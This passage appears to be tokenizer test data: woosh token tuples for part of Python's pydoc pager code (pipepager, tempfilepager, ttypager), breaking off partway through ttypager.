woosh.Token(woosh.NAME, 'if', 1583, 8, 1583, 10),
woosh.Token(woosh.NAME, 'hasattr', 1583, 11, 1583, 18),
woosh.Token(woosh.OP, '(', 1583, 18, 1583, 19),
woosh.Token(woosh.NAME, 'os', 1583, 19, 1583, 21),
woosh.Token(woosh.OP, ',', 1583, 21, 1583, 22),
woosh.Token(woosh.STRING, "'system'", 1583, 23, 1583, 31),
woosh.Token(woosh.OP, ')', 1583, 31, 1583, 32),
woosh.Token(woosh.NAME, 'and', 1583, 33, 1583, 36),
woosh.Token(woosh.NAME, 'os', 1583, 37, 1583, 39),
woosh.Token(woosh.OP, '.', 1583, 39, 1583, 40),
woosh.Token(woosh.NAME, 'system', 1583, 40, 1583, 46),
woosh.Token(woosh.OP, '(', 1583, 46, 1583, 47),
woosh.Token(woosh.STRING, '\'more "%s"\'', 1583, 47, 1583, 58),
woosh.Token(woosh.OP, '%', 1583, 59, 1583, 60),
woosh.Token(woosh.NAME, 'filename', 1583, 61, 1583, 69),
woosh.Token(woosh.OP, ')', 1583, 69, 1583, 70),
woosh.Token(woosh.OP, '==', 1583, 71, 1583, 73),
woosh.Token(woosh.NUMBER, '0', 1583, 74, 1583, 75),
woosh.Token(woosh.OP, ':', 1583, 75, 1583, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1583, 76, 1584, 0),
woosh.Token(woosh.INDENT, ' ', 1584, 0, 1584, 12),
woosh.Token(woosh.NAME, 'return', 1584, 12, 1584, 18),
woosh.Token(woosh.NAME, 'lambda', 1584, 19, 1584, 25),
woosh.Token(woosh.NAME, 'text', 1584, 26, 1584, 30),
woosh.Token(woosh.OP, ':', 1584, 30, 1584, 31),
woosh.Token(woosh.NAME, 'pipepager', 1584, 32, 1584, 41),
woosh.Token(woosh.OP, '(', 1584, 41, 1584, 42),
woosh.Token(woosh.NAME, 'text', 1584, 42, 1584, 46),
woosh.Token(woosh.OP, ',', 1584, 46, 1584, 47),
woosh.Token(woosh.STRING, "'more'", 1584, 48, 1584, 54),
woosh.Token(woosh.OP, ')', 1584, 54, 1584, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1584, 55, 1585, 0),
woosh.Token(woosh.DEDENT, ' ', 1585, 0, 1585, 8),
woosh.Token(woosh.NAME, 'else', 1585, 8, 1585, 12),
woosh.Token(woosh.OP, ':', 1585, 12, 1585, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1585, 13, 1586, 0),
woosh.Token(woosh.INDENT, ' ', 1586, 0, 1586, 12),
woosh.Token(woosh.NAME, 'return', 1586, 12, 1586, 18),
woosh.Token(woosh.NAME, 'ttypager', 1586, 19, 1586, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1586, 27, 1587, 0),
woosh.Token(woosh.DEDENT, ' ', 1587, 0, 1587, 4),
woosh.Token(woosh.DEDENT, '', 1587, 4, 1587, 4),
woosh.Token(woosh.NAME, 'finally', 1587, 4, 1587, 11),
woosh.Token(woosh.OP, ':', 1587, 11, 1587, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1587, 12, 1588, 0),
woosh.Token(woosh.INDENT, ' ', 1588, 0, 1588, 8),
woosh.Token(woosh.NAME, 'os', 1588, 8, 1588, 10),
woosh.Token(woosh.OP, '.', 1588, 10, 1588, 11),
woosh.Token(woosh.NAME, 'unlink', 1588, 11, 1588, 17),
woosh.Token(woosh.OP, '(', 1588, 17, 1588, 18),
woosh.Token(woosh.NAME, 'filename', 1588, 18, 1588, 26),
woosh.Token(woosh.OP, ')', 1588, 26, 1588, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1588, 27, 1589, 0),
woosh.Token(woosh.DEDENT, '', 1590, 0, 1590, 0),
woosh.Token(woosh.DEDENT, '', 1590, 0, 1590, 0),
woosh.Token(woosh.NAME, 'def', 1590, 0, 1590, 3),
woosh.Token(woosh.NAME, 'plain', 1590, 4, 1590, 9),
woosh.Token(woosh.OP, '(', 1590, 9, 1590, 10),
woosh.Token(woosh.NAME, 'text', 1590, 10, 1590, 14),
woosh.Token(woosh.OP, ')', 1590, 14, 1590, 15),
woosh.Token(woosh.OP, ':', 1590, 15, 1590, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1590, 16, 1591, 0),
woosh.Token(woosh.INDENT, ' ', 1591, 0, 1591, 4),
woosh.Token(woosh.STRING, '"""Remove boldface formatting from text."""', 1591, 4, 1591, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1591, 47, 1592, 0),
woosh.Token(woosh.NAME, 'return', 1592, 4, 1592, 10),
woosh.Token(woosh.NAME, 're', 1592, 11, 1592, 13),
woosh.Token(woosh.OP, '.', 1592, 13, 1592, 14),
woosh.Token(woosh.NAME, 'sub', 1592, 14, 1592, 17),
woosh.Token(woosh.OP, '(', 1592, 17, 1592, 18),
woosh.Token(woosh.STRING, "'.\\b'", 1592, 18, 1592, 23),
woosh.Token(woosh.OP, ',', 1592, 23, 1592, 24),
woosh.Token(woosh.STRING, "''", 1592, 25, 1592, 27),
woosh.Token(woosh.OP, ',', 1592, 27, 1592, 28),
woosh.Token(woosh.NAME, 'text', 1592, 29, 1592, 33),
woosh.Token(woosh.OP, ')', 1592, 33, 1592, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1592, 34, 1593, 0),
woosh.Token(woosh.DEDENT, '', 1594, 0, 1594, 0),
woosh.Token(woosh.NAME, 'def', 1594, 0, 1594, 3),
woosh.Token(woosh.NAME, 'pipepager', 1594, 4, 1594, 13),
woosh.Token(woosh.OP, '(', 1594, 13, 1594, 14),
woosh.Token(woosh.NAME, 'text', 1594, 14, 1594, 18),
woosh.Token(woosh.OP, ',', 1594, 18, 1594, 19),
woosh.Token(woosh.NAME, 'cmd', 1594, 20, 1594, 23),
woosh.Token(woosh.OP, ')', 1594, 23, 1594, 24),
woosh.Token(woosh.OP, ':', 1594, 24, 1594, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1594, 25, 1595, 0),
woosh.Token(woosh.INDENT, ' ', 1595, 0, 1595, 4),
woosh.Token(woosh.STRING, '"""Page through text by feeding it to another program."""', 1595, 4, 1595, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1595, 61, 1596, 0),
woosh.Token(woosh.NAME, 'import', 1596, 4, 1596, 10),
woosh.Token(woosh.NAME, 'subprocess', 1596, 11, 1596, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1596, 21, 1597, 0),
woosh.Token(woosh.NAME, 'proc', 1597, 4, 1597, 8),
woosh.Token(woosh.OP, '=', 1597, 9, 1597, 10),
woosh.Token(woosh.NAME, 'subprocess', 1597, 11, 1597, 21),
woosh.Token(woosh.OP, '.', 1597, 21, 1597, 22),
woosh.Token(woosh.NAME, 'Popen', 1597, 22, 1597, 27),
woosh.Token(woosh.OP, '(', 1597, 27, 1597, 28),
woosh.Token(woosh.NAME, 'cmd', 1597, 28, 1597, 31),
woosh.Token(woosh.OP, ',', 1597, 31, 1597, 32),
woosh.Token(woosh.NAME, 'shell', 1597, 33, 1597, 38),
woosh.Token(woosh.OP, '=', 1597, 38, 1597, 39),
woosh.Token(woosh.NAME, 'True', 1597, 39, 1597, 43),
woosh.Token(woosh.OP, ',', 1597, 43, 1597, 44),
woosh.Token(woosh.NAME, 'stdin', 1597, 45, 1597, 50),
woosh.Token(woosh.OP, '=', 1597, 50, 1597, 51),
woosh.Token(woosh.NAME, 'subprocess', 1597, 51, 1597, 61),
woosh.Token(woosh.OP, '.', 1597, 61, 1597, 62),
woosh.Token(woosh.NAME, 'PIPE', 1597, 62, 1597, 66),
woosh.Token(woosh.OP, ')', 1597, 66, 1597, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 1597, 67, 1598, 0),
woosh.Token(woosh.NAME, 'try', 1598, 4, 1598, 7),
woosh.Token(woosh.OP, ':', 1598, 7, 1598, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1598, 8, 1599, 0),
woosh.Token(woosh.INDENT, ' ', 1599, 0, 1599, 8),
woosh.Token(woosh.NAME, 'with', 1599, 8, 1599, 12),
woosh.Token(woosh.NAME, 'io', 1599, 13, 1599, 15),
woosh.Token(woosh.OP, '.', 1599, 15, 1599, 16),
woosh.Token(woosh.NAME, 'TextIOWrapper', 1599, 16, 1599, 29),
woosh.Token(woosh.OP, '(', 1599, 29, 1599, 30),
woosh.Token(woosh.NAME, 'proc', 1599, 30, 1599, 34),
woosh.Token(woosh.OP, '.', 1599, 34, 1599, 35),
woosh.Token(woosh.NAME, 'stdin', 1599, 35, 1599, 40),
woosh.Token(woosh.OP, ',', 1599, 40, 1599, 41),
woosh.Token(woosh.NAME, 'errors', 1599, 42, 1599, 48),
woosh.Token(woosh.OP, '=', 1599, 48, 1599, 49),
woosh.Token(woosh.STRING, "'backslashreplace'", 1599, 49, 1599, 67),
woosh.Token(woosh.OP, ')', 1599, 67, 1599, 68),
woosh.Token(woosh.NAME, 'as', 1599, 69, 1599, 71),
woosh.Token(woosh.NAME, 'pipe', 1599, 72, 1599, 76),
woosh.Token(woosh.OP, ':', 1599, 76, 1599, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 1599, 77, 1600, 0),
woosh.Token(woosh.INDENT, ' ', 1600, 0, 1600, 12),
woosh.Token(woosh.NAME, 'try', 1600, 12, 1600, 15),
woosh.Token(woosh.OP, ':', 1600, 15, 1600, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1600, 16, 1601, 0),
woosh.Token(woosh.INDENT, ' ', 1601, 0, 1601, 16),
woosh.Token(woosh.NAME, 'pipe', 1601, 16, 1601, 20),
woosh.Token(woosh.OP, '.', 1601, 20, 1601, 21),
woosh.Token(woosh.NAME, 'write', 1601, 21, 1601, 26),
woosh.Token(woosh.OP, '(', 1601, 26, 1601, 27),
woosh.Token(woosh.NAME, 'text', 1601, 27, 1601, 31),
woosh.Token(woosh.OP, ')', 1601, 31, 1601, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1601, 32, 1602, 0),
woosh.Token(woosh.DEDENT, ' ', 1602, 0, 1602, 12),
woosh.Token(woosh.NAME, 'except', 1602, 12, 1602, 18),
woosh.Token(woosh.NAME, 'KeyboardInterrupt', 1602, 19, 1602, 36),
woosh.Token(woosh.OP, ':', 1602, 36, 1602, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1602, 37, 1603, 0),
woosh.Token(woosh.COMMENT, "# We've hereby abandoned whatever text hasn't been written,", 1603, 16, 1603, 75),
woosh.Token(woosh.COMMENT, '# but the pager is still in control of the terminal.', 1604, 16, 1604, 68),
woosh.Token(woosh.INDENT, ' ', 1605, 0, 1605, 16),
woosh.Token(woosh.NAME, 'pass', 1605, 16, 1605, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1605, 20, 1606, 0),
woosh.Token(woosh.DEDENT, ' ', 1606, 0, 1606, 4),
woosh.Token(woosh.DEDENT, '', 1606, 4, 1606, 4),
woosh.Token(woosh.DEDENT, '', 1606, 4, 1606, 4),
woosh.Token(woosh.NAME, 'except', 1606, 4, 1606, 10),
woosh.Token(woosh.NAME, 'OSError', 1606, 11, 1606, 18),
woosh.Token(woosh.OP, ':', 1606, 18, 1606, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1606, 19, 1607, 0),
woosh.Token(woosh.INDENT, ' ', 1607, 0, 1607, 8),
woosh.Token(woosh.NAME, 'pass', 1607, 8, 1607, 12),
woosh.Token(woosh.COMMENT, '# Ignore broken pipes caused by quitting the pager program.', 1607, 13, 1607, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1607, 72, 1608, 0),
woosh.Token(woosh.DEDENT, ' ', 1608, 0, 1608, 4),
woosh.Token(woosh.NAME, 'while', 1608, 4, 1608, 9),
woosh.Token(woosh.NAME, 'True', 1608, 10, 1608, 14),
woosh.Token(woosh.OP, ':', 1608, 14, 1608, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1608, 15, 1609, 0),
woosh.Token(woosh.INDENT, ' ', 1609, 0, 1609, 8),
woosh.Token(woosh.NAME, 'try', 1609, 8, 1609, 11),
woosh.Token(woosh.OP, ':', 1609, 11, 1609, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1609, 12, 1610, 0),
woosh.Token(woosh.INDENT, ' ', 1610, 0, 1610, 12),
woosh.Token(woosh.NAME, 'proc', 1610, 12, 1610, 16),
woosh.Token(woosh.OP, '.', 1610, 16, 1610, 17),
woosh.Token(woosh.NAME, 'wait', 1610, 17, 1610, 21),
woosh.Token(woosh.OP, '(', 1610, 21, 1610, 22),
woosh.Token(woosh.OP, ')', 1610, 22, 1610, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1610, 23, 1611, 0),
woosh.Token(woosh.NAME, 'break', 1611, 12, 1611, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1611, 17, 1612, 0),
woosh.Token(woosh.DEDENT, ' ', 1612, 0, 1612, 8),
woosh.Token(woosh.NAME, 'except', 1612, 8, 1612, 14),
woosh.Token(woosh.NAME, 'KeyboardInterrupt', 1612, 15, 1612, 32),
woosh.Token(woosh.OP, ':', 1612, 32, 1612, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1612, 33, 1613, 0),
woosh.Token(woosh.COMMENT, '# Ignore ctl-c like the pager itself does. Otherwise the pager is', 1613, 12, 1613, 78),
woosh.Token(woosh.COMMENT, '# left running and the terminal is in raw mode and unusable.', 1614, 12, 1614, 72),
woosh.Token(woosh.INDENT, ' ', 1615, 0, 1615, 12),
woosh.Token(woosh.NAME, 'pass', 1615, 12, 1615, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1615, 16, 1616, 0),
woosh.Token(woosh.DEDENT, '', 1617, 0, 1617, 0),
woosh.Token(woosh.DEDENT, '', 1617, 0, 1617, 0),
woosh.Token(woosh.DEDENT, '', 1617, 0, 1617, 0),
woosh.Token(woosh.NAME, 'def', 1617, 0, 1617, 3),
woosh.Token(woosh.NAME, 'tempfilepager', 1617, 4, 1617, 17),
woosh.Token(woosh.OP, '(', 1617, 17, 1617, 18),
woosh.Token(woosh.NAME, 'text', 1617, 18, 1617, 22),
woosh.Token(woosh.OP, ',', 1617, 22, 1617, 23),
woosh.Token(woosh.NAME, 'cmd', 1617, 24, 1617, 27),
woosh.Token(woosh.OP, ')', 1617, 27, 1617, 28),
woosh.Token(woosh.OP, ':', 1617, 28, 1617, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1617, 29, 1618, 0),
woosh.Token(woosh.INDENT, ' ', 1618, 0, 1618, 4),
woosh.Token(woosh.STRING, '"""Page through text by invoking a program on a temporary file."""', 1618, 4, 1618, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 1618, 70, 1619, 0),
woosh.Token(woosh.NAME, 'import', 1619, 4, 1619, 10),
woosh.Token(woosh.NAME, 'tempfile', 1619, 11, 1619, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1619, 19, 1620, 0),
woosh.Token(woosh.NAME, 'filename', 1620, 4, 1620, 12),
woosh.Token(woosh.OP, '=', 1620, 13, 1620, 14),
woosh.Token(woosh.NAME, 'tempfile', 1620, 15, 1620, 23),
woosh.Token(woosh.OP, '.', 1620, 23, 1620, 24),
woosh.Token(woosh.NAME, 'mktemp', 1620, 24, 1620, 30),
woosh.Token(woosh.OP, '(', 1620, 30, 1620, 31),
woosh.Token(woosh.OP, ')', 1620, 31, 1620, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1620, 32, 1621, 0),
woosh.Token(woosh.NAME, 'with', 1621, 4, 1621, 8),
woosh.Token(woosh.NAME, 'open', 1621, 9, 1621, 13),
woosh.Token(woosh.OP, '(', 1621, 13, 1621, 14),
woosh.Token(woosh.NAME, 'filename', 1621, 14, 1621, 22),
woosh.Token(woosh.OP, ',', 1621, 22, 1621, 23),
woosh.Token(woosh.STRING, "'w'", 1621, 24, 1621, 27),
woosh.Token(woosh.OP, ',', 1621, 27, 1621, 28),
woosh.Token(woosh.NAME, 'errors', 1621, 29, 1621, 35),
woosh.Token(woosh.OP, '=', 1621, 35, 1621, 36),
woosh.Token(woosh.STRING, "'backslashreplace'", 1621, 36, 1621, 54),
woosh.Token(woosh.OP, ')', 1621, 54, 1621, 55),
woosh.Token(woosh.NAME, 'as', 1621, 56, 1621, 58),
woosh.Token(woosh.NAME, 'file', 1621, 59, 1621, 63),
woosh.Token(woosh.OP, ':', 1621, 63, 1621, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1621, 64, 1622, 0),
woosh.Token(woosh.INDENT, ' ', 1622, 0, 1622, 8),
woosh.Token(woosh.NAME, 'file', 1622, 8, 1622, 12),
woosh.Token(woosh.OP, '.', 1622, 12, 1622, 13),
woosh.Token(woosh.NAME, 'write', 1622, 13, 1622, 18),
woosh.Token(woosh.OP, '(', 1622, 18, 1622, 19),
woosh.Token(woosh.NAME, 'text', 1622, 19, 1622, 23),
woosh.Token(woosh.OP, ')', 1622, 23, 1622, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1622, 24, 1623, 0),
woosh.Token(woosh.DEDENT, ' ', 1623, 0, 1623, 4),
woosh.Token(woosh.NAME, 'try', 1623, 4, 1623, 7),
woosh.Token(woosh.OP, ':', 1623, 7, 1623, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1623, 8, 1624, 0),
woosh.Token(woosh.INDENT, ' ', 1624, 0, 1624, 8),
woosh.Token(woosh.NAME, 'os', 1624, 8, 1624, 10),
woosh.Token(woosh.OP, '.', 1624, 10, 1624, 11),
woosh.Token(woosh.NAME, 'system', 1624, 11, 1624, 17),
woosh.Token(woosh.OP, '(', 1624, 17, 1624, 18),
woosh.Token(woosh.NAME, 'cmd', 1624, 18, 1624, 21),
woosh.Token(woosh.OP, '+', 1624, 22, 1624, 23),
woosh.Token(woosh.STRING, '\' "\'', 1624, 24, 1624, 28),
woosh.Token(woosh.OP, '+', 1624, 29, 1624, 30),
woosh.Token(woosh.NAME, 'filename', 1624, 31, 1624, 39),
woosh.Token(woosh.OP, '+', 1624, 40, 1624, 41),
woosh.Token(woosh.STRING, '\'"\'', 1624, 42, 1624, 45),
woosh.Token(woosh.OP, ')', 1624, 45, 1624, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1624, 46, 1625, 0),
woosh.Token(woosh.DEDENT, ' ', 1625, 0, 1625, 4),
woosh.Token(woosh.NAME, 'finally', 1625, 4, 1625, 11),
woosh.Token(woosh.OP, ':', 1625, 11, 1625, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1625, 12, 1626, 0),
woosh.Token(woosh.INDENT, ' ', 1626, 0, 1626, 8),
woosh.Token(woosh.NAME, 'os', 1626, 8, 1626, 10),
woosh.Token(woosh.OP, '.', 1626, 10, 1626, 11),
woosh.Token(woosh.NAME, 'unlink', 1626, 11, 1626, 17),
woosh.Token(woosh.OP, '(', 1626, 17, 1626, 18),
woosh.Token(woosh.NAME, 'filename', 1626, 18, 1626, 26),
woosh.Token(woosh.OP, ')', 1626, 26, 1626, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1626, 27, 1627, 0),
woosh.Token(woosh.DEDENT, '', 1628, 0, 1628, 0),
woosh.Token(woosh.DEDENT, '', 1628, 0, 1628, 0),
woosh.Token(woosh.NAME, 'def', 1628, 0, 1628, 3),
woosh.Token(woosh.NAME, '_escape_stdout', 1628, 4, 1628, 18),
woosh.Token(woosh.OP, '(', 1628, 18, 1628, 19),
woosh.Token(woosh.NAME, 'text', 1628, 19, 1628, 23),
woosh.Token(woosh.OP, ')', 1628, 23, 1628, 24),
woosh.Token(woosh.OP, ':', 1628, 24, 1628, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1628, 25, 1629, 0),
woosh.Token(woosh.COMMENT, '# Escape non-encodable characters to avoid encoding errors later', 1629, 4, 1629, 68),
woosh.Token(woosh.INDENT, ' ', 1630, 0, 1630, 4),
woosh.Token(woosh.NAME, 'encoding', 1630, 4, 1630, 12),
woosh.Token(woosh.OP, '=', 1630, 13, 1630, 14),
woosh.Token(woosh.NAME, 'getattr', 1630, 15, 1630, 22),
woosh.Token(woosh.OP, '(', 1630, 22, 1630, 23),
woosh.Token(woosh.NAME, 'sys', 1630, 23, 1630, 26),
woosh.Token(woosh.OP, '.', 1630, 26, 1630, 27),
woosh.Token(woosh.NAME, 'stdout', 1630, 27, 1630, 33),
woosh.Token(woosh.OP, ',', 1630, 33, 1630, 34),
woosh.Token(woosh.STRING, "'encoding'", 1630, 35, 1630, 45),
woosh.Token(woosh.OP, ',', 1630, 45, 1630, 46),
woosh.Token(woosh.NAME, 'None', 1630, 47, 1630, 51),
woosh.Token(woosh.OP, ')', 1630, 51, 1630, 52),
woosh.Token(woosh.NAME, 'or', 1630, 53, 1630, 55),
woosh.Token(woosh.STRING, "'utf-8'", 1630, 56, 1630, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1630, 63, 1631, 0),
woosh.Token(woosh.NAME, 'return', 1631, 4, 1631, 10),
woosh.Token(woosh.NAME, 'text', 1631, 11, 1631, 15),
woosh.Token(woosh.OP, '.', 1631, 15, 1631, 16),
woosh.Token(woosh.NAME, 'encode', 1631, 16, 1631, 22),
woosh.Token(woosh.OP, '(', 1631, 22, 1631, 23),
woosh.Token(woosh.NAME, 'encoding', 1631, 23, 1631, 31),
woosh.Token(woosh.OP, ',', 1631, 31, 1631, 32),
woosh.Token(woosh.STRING, "'backslashreplace'", 1631, 33, 1631, 51),
woosh.Token(woosh.OP, ')', 1631, 51, 1631, 52),
woosh.Token(woosh.OP, '.', 1631, 52, 1631, 53),
woosh.Token(woosh.NAME, 'decode', 1631, 53, 1631, 59),
woosh.Token(woosh.OP, '(', 1631, 59, 1631, 60),
woosh.Token(woosh.NAME, 'encoding', 1631, 60, 1631, 68),
woosh.Token(woosh.OP, ')', 1631, 68, 1631, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1631, 69, 1632, 0),
woosh.Token(woosh.DEDENT, '', 1633, 0, 1633, 0),
woosh.Token(woosh.NAME, 'def', 1633, 0, 1633, 3),
woosh.Token(woosh.NAME, 'ttypager', 1633, 4, 1633, 12),
woosh.Token(woosh.OP, '(', 1633, 12, 1633, 13),
woosh.Token(woosh.NAME, 'text', 1633, 13, 1633, 17),
woosh.Token(woosh.OP, ')', 1633, 17, 1633, 18),
woosh.Token(woosh.OP, ':', 1633, 18, 1633, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1633, 19, 1634, 0),
woosh.Token(woosh.INDENT, ' ', 1634, 0, 1634, 4),
woosh.Token(woosh.STRING, '"""Page through text on a text terminal."""', 1634, 4, 1634, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1634, 47, 1635, 0),
woosh.Token(woosh.NAME, 'lines', 1635, 4, 1635, 9),
woosh.Token(woosh.OP, '=', 1635, 10, 1635, 11),
woosh.Token(woosh.NAME, 'plain', 1635, 12, 1635, 17),
woosh.Token(woosh.OP, '(', 1635, 17, 1635, 18),
woosh.Token(woosh.NAME, '_escape_stdout', 1635, 18, 1635, 32),
woosh.Token(woosh.OP, '(', 1635, 32, 1635, 33),
woosh.Token(woosh.NAME, 'text', 1635, 33, 1635, 37),
woosh.Token(woosh.OP, ')', 1635, 37, 1635, 38),
woosh.Token(woosh.OP, ')', 1635, 38, 1635, 39),
woosh.Token(woosh.OP, '.', 1635, 39, 1635, 40),
woosh.Token(woosh.NAME, 'split', 1635, 40, 1635, 45),
woosh.Token(woosh.OP, '(', 1635, 45, 1635, 46),
woosh.Token(woosh.STRING, "'\\n'", 1635, 46, 1635, 50),
woosh.Token(woosh.OP, ')', 1635, 50, 1635, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1635, 51, 1636, 0),
woosh.Token(woosh.NAME, 'try', 1636, 4, 1636, 7),
woosh.Token(woosh.OP, ':', 1636, 7, 1636, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1636, 8, 1637, 0),
woosh.Token(woosh.INDENT, ' ', 1637, 0, 1637, 8),
woosh.Token(woosh.NAME, 'import', 1637, 8, 1637, 14),
woosh.Token(woosh.NAME, 'tty', 1637, 15, 1637, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1637, 18, 1638, 0),
woosh.Token(woosh.NAME, 'fd', 1638, 8, 1638, 10),
woosh.Token(woosh.OP, '=', 1638, 11, 1638, 12),
woosh.Token(woosh.NAME, 'sys', 1638, 13, 1638, 16),
woosh.Token(woosh.OP, '.', 1638, 16, 1638, 17),
woosh.Token(woosh.NAME, 'stdin', 1638, 17, 1638, 22),
woosh.Token(woosh.OP, '.', 1638, 22, 1638, 23),
woosh.Token(woosh.NAME, 'fileno', 1638, 23, 1638, 29),
woosh.Token(woosh.OP, '(', 1638, 29, 1638, 30),
woosh.Token(woosh.OP, ')', 1638, 30, 1638, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1638, 31, 1639, 0),
woosh.Token(woosh.NAME, 'old', 1639, 8, 1639, 11),
woosh.Token(woosh.OP, '=', 1639, 12, 1639, 13),
woosh.Token(woosh.NAME, 'tty', 1639, 14, 1639, 17),
woosh.Token(woosh.OP, '.', 1639, 17, 1639, 18),
woosh.Token(woosh.NAME, 'tcgetattr', 1639, 18, 1639, 27),
woosh.Token(woosh.OP, '(', 1639, 27, 1639, 28),
woosh.Token(woosh.NAME, 'fd', 1639, 28, 1639, 30),
woosh.Token(woosh.OP, ')', 1639, 30, 1639, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1639, 31, 1640, 0),
woosh.Token(woosh.NAME, 'tty', 1640, 8, 1640, 11),
woosh.Token(woosh.OP, '.', 1640, 11, 1640, 12),
woosh.Token(woosh.NAME, 'setcbreak', 1640, 12, 1640, 21),
woosh.Token(woosh.OP, '(', 1640, 21, 1640, 22),
woosh.Token(woosh.NAME, 'fd', 1640, 22, 1640, 24),
woosh.Token(woosh.OP, ')', 1640, 24, 1640, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1640, 25, 1641, 0),
woosh.Token(woosh.NAME, 'getchar', 1641, 8, 1641, 15),
woosh.Token(woosh.OP, '=', 1641, 16, 1641, 17),
woosh.Token(woosh.NAME, 'lambda', 1641, 18, 1641, 24),
woosh.Token(woosh.OP, ':', 1641, 24, 1641, 25),
woosh.Token(woosh.NAME, 'sys', 1641, 26, 1641, 29),
woosh.Token(woosh.OP, '.', 1641, 29, 1641, 30),
woosh.Token(woosh.NAME, 'stdin', 1641, 30, 1641, 35),
woosh.Token(woosh.OP, '.', 1641, 35, 1641, 36),
woosh.Token(woosh.NAME, 'read', 1641, 36, 1641, 40),
woosh.Token(woosh.OP, '(', 1641, 40, 1641, 41),
woosh.Token(woosh.NUMBER, '1', 1641, 41, 1641, 42),
woosh.Token(woosh.OP, ')', 1641, 42, 1641, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1641, 43, 1642, 0),
woosh.Token(woosh.DEDENT, ' ', 1642, 0, 1642, 4),
woosh.Token(woosh.NAME, 'except', 1642, 4, 1642, 10),
woosh.Token(woosh.OP, '(', 1642, 11, 1642, 12),
woosh.Token(woosh.NAME, 'ImportError', 1642, 12, 1642, 23),
woosh.Token(woosh.OP, ',', 1642, 23, 1642, 24),
woosh.Token(woosh.NAME, 'AttributeError', 1642, 25, 1642, 39),
woosh.Token(woosh.OP, ',', 1642, 39, 1642, 40),
woosh.Token(woosh.NAME, 'io', 1642, 41, 1642, 43),
woosh.Token(woosh.OP, '.', 1642, 43, 1642, 44),
woosh.Token(woosh.NAME, 'UnsupportedOperation', 1642, 44, 1642, 64),
woosh.Token(woosh.OP, ')', 1642, 64, 1642, 65),
woosh.Token(woosh.OP, ':', 1642, 65, 1642, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 1642, 66, 1643, 0),
woosh.Token(woosh.INDENT, ' ', 1643, 0, 1643, 8),
woosh.Token(woosh.NAME, 'tty', 1643, 8, 1643, 11),
woosh.Token(woosh.OP, '=', 1643, 12, 1643, 13),
woosh.Token(woosh.NAME, 'None', 1643, 14, 1643, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1643, 18, 1644, 0),
woosh.Token(woosh.NAME, 'getchar', 1644, 8, 1644, 15),
woosh.Token(woosh.OP, '=', 1644, 16, 1644, 17),
woosh.Token(woosh.NAME, 'lambda', 1644, 18, 1644, 24),
woosh.Token(woosh.OP, ':', 1644, 24, 1644, 25),
woosh.Token(woosh.NAME, 'sys', 1644, 26, 1644, 29),
woosh.Token(woosh.OP, '.', 1644, 29, 1644, 30),
woosh.Token(woosh.NAME, 'stdin', 1644, 30, 1644, 35),
woosh.Token(woosh.OP, '.', 1644, 35, 1644, 36),
woosh.Token(woosh.NAME, 'readline', 1644, 36, 1644, 44),
woosh.Token(woosh.OP, '(', 1644, 44, 1644, 45),
woosh.Token(woosh.OP, ')', 1644, 45, 1644, 46),
woosh.Token(woosh.OP, '[', 1644, 46, 1644, 47),
woosh.Token(woosh.OP, ':', 1644, 47, 1644, 48),
woosh.Token(woosh.OP, '-', 1644, 48, 1644, 49),
woosh.Token(woosh.NUMBER, '1', 1644, 49, 1644, 50),
woosh.Token(woosh.OP, ']', 1644, 50, 1644, 51),
woosh.Token(woosh.OP, '[', 1644, 51, 1644, 52),
woosh.Token(woosh.OP, ':', 1644, 52, 1644, 53),
woosh.Token(woosh.NUMBER, '1', 1644, 53, 1644, 54),
woosh.Token(woosh.OP, ']', 1644, 54, 1644, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1644, 55, 1645, 0),
woosh.Token(woosh.DEDENT, ' ', 1646, 0, 1646, 4),
woosh.Token(woosh.NAME, 'try', 1646, 4, 1646, 7),
woosh.Token(woosh.OP, ':', 1646, 7, 1646, 8),
